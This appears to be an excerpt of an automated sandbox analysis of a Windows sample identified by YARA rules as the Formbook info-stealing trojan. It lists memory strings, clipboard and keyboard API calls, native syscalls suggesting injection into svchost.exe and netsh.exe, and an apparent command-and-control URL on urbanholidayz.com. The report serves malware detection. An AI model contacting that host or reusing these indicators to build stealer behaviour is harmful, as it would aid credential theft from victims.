          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
          Source: explorer.exe, 00000002.00000000.1711936620.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4147214666.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
          Source: explorer.exe, 00000002.00000000.1711936620.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4147214666.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
          Source: explorer.exe, 00000002.00000002.4157772828.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108835540.000000000C5E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1718215415.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3478580226.000000000C5E2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
          Source: explorer.exe, 00000002.00000000.1711936620.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4147214666.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
          Source: explorer.exe, 00000002.00000002.4157772828.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108835540.000000000C5E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1718215415.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3478580226.000000000C5E2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com_
          Source: explorer.exe, 00000002.00000002.4157772828.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108835540.000000000C5E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1718215415.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3478580226.000000000C5E2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
          Source: explorer.exe, 00000002.00000002.4160740233.00000000112AF000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000003.00000002.4144970692.0000000003FBF000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://urbanholidayz.com/jd21/?4h6=58Yhl8pxScvjrZW7vdX/11LwICGJdJmrB7bkiksH/i9UnBAUhv3EZPgtL2ZDcYGs
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000002.00000002.4157772828.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1718215415.000000000C557000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/L
          Source: explorer.exe, 00000002.00000002.4157772828.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108835540.000000000C5E2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1718215415.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3478580226.000000000C5E2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.com
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4147214666.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
          Source: explorer.exe, 00000002.00000002.4147214666.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
          Source: explorer.exe, 00000002.00000002.4147214666.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007900000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe Code function: 0_2_0101EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0101EAFF
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe Code function: 0_2_0101ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0101ED6A
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe Code function: 0_2_0101EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0101EAFF
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe Code function: 0_2_0100AB9C GetKeyState,GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0100AB9C
          Source: C:\Users\user\Desktop\8t1uarSZFV.exe Code function: 0_2_01039576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_01039576

          E-Banking Fraud

          Source: Yara match File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.8t1uarSZFV.exe.f10000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.8t1uarSZFV.exe.f10000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.8t1uarSZFV.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.8t1uarSZFV.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.8t1uarSZFV.exe.f10000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.8t1uarSZFV.exe.f10000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.8t1uarSZFV.exe.f10000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.8t1uarSZFV.exe.f10000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.4143896558.0000000000E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1763621828.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.4143556065.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1763854719.0000000000D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1708200565.0000000000F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.4143849361.0000000000E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1763894403.0000000000D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: 8t1uarSZFV.exe PID: 7292, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 7312, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: netsh.exe PID: 7396, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 8t1uarSZFV.exe String found in binary or memory: This is a third-party compiled AutoIt script.
          Source: 8t1uarSZFV.exe, 00000000.00000000.1684216333.0000000001062000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script.memstr_a30fc377-d
          Source: 8t1uarSZFV.exe, 00000000.00000000.1684216333.0000000001062000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_ce7cf190-6
          Source: 8t1uarSZFV.exe String found in binary or memory: This is a third-party compiled AutoIt script.memstr_318fc6fc-4
          Source: 8t1uarSZFV.exe String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_ce7b8d72-4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A350 NtCreateFile,1_2_0041A350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A400 NtReadFile,1_2_0041A400
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A480 NtClose,1_2_0041A480
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A530 NtAllocateVirtualMemory,1_2_0041A530
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A47A NtClose,1_2_0041A47A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012B60 NtClose,LdrInitializeThunk,1_2_03012B60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012BF0 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_03012BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012AD0 NtReadFile,LdrInitializeThunk,1_2_03012AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012F30 NtCreateSection,LdrInitializeThunk,1_2_03012F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012F90 NtProtectVirtualMemory,LdrInitializeThunk,1_2_03012F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012FB0 NtResumeThread,LdrInitializeThunk,1_2_03012FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012FE0 NtCreateFile,LdrInitializeThunk,1_2_03012FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012E80 NtReadVirtualMemory,LdrInitializeThunk,1_2_03012E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_03012EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012D10 NtMapViewOfSection,LdrInitializeThunk,1_2_03012D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012D30 NtUnmapViewOfSection,LdrInitializeThunk,1_2_03012D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012DD0 NtDelayExecution,LdrInitializeThunk,1_2_03012DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03012DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03012CA0 NtQueryInformationToken,LdrInitializeThunk,1_2_03012CA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03014340 NtSetContextThread,1_2_03014340
